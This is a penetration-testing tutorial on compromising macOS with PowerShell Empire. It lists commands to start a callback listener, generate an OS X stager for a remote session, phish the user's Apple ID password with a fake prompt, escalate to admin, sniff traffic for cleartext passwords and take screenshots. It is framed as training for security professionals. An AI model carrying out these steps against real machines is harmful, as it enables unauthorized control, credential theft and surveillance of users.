OSX Exploitation with Powershell Empire
This article is another post in the Empire series. In this article, we will learn OSX Penetration testing using PowerShell Empire.
Table of Content
Exploiting MAC
Post Exploitation
- Phishing
- Privilege Escalation
- Sniffing
Exploiting MAC
Here, I’m assuming you know PowerShell Empire’s basics, therefore, we will create the listener first using the following commands:
uselistener http set Host //192.168.1.26 execute
Executing the above commands will start up the listener as shown in the image above. Now the next step is to create a stage for OS X. And for that, type :
usestager osx/launcher execute
As you can see in the image above, the above stager will generate a code. Execute this code in the target system i.e. OS X and after the execution, you will have your session as shown in the image below :
Post Exploitation
Phishing
As we have the session of our Mac, a few post-exploits can be used to our advantage. For instance, the first post-exploitation module we can use is collection/osx/prompt. This module will ask the user to enter their Apple ID password. However, it is important to note that this module does not operate in stealth mode :
usemodule collection/osx/prompt execute
Executing the above module will open a prompt in the target machine as shown in the image below, and when you enter the password you have it in clear text as shown in the image above.
Privilege Escalation
For the privilege escalation of OS X, we have used the module privesc/multi/sudo_spawn. To use this module type :
usemodule privesc/multi/sudo_spawn set Listener http set Password toor execute
Executing this module will give you admin rights with a new session, as you can see in the image below :
Sniffing
The module we will use is collection/osx/sniffer. This will sniff around all the traffic coming to and going from our target system and give us all the necessary details by creating a pcap file. To use the module type :
usemodule collection/osx/sniffer execute
As you can see, that you will even find the password in clear text in the pcap file as shown in the image below :
Then, post module is of taking a screenshot of the target system and using the said module type :
usemodule collection/osx/screenshot execute
The above module will take a screenshot as shown in the image below :
There is a further number of post modules which you can use and experiment with as shown in the image below :
The article on OSX Exploitation with PowerShell Empire demonstrates how attackers can leverage PowerShell Empire to gain unauthorized access to macOS systems. It explains how modules for phishing, privilege escalation, and network sniffing can be used to effectively compromise and control target machines. Therefore, understanding these techniques is crucial for cybersecurity professionals aiming to detect and mitigate such threats.
To learn more about PowerShell. Follow this Link.
Author: Sanjeet Kumar is an Information Security Analyst | Pentester | and Researcher. Contact Here
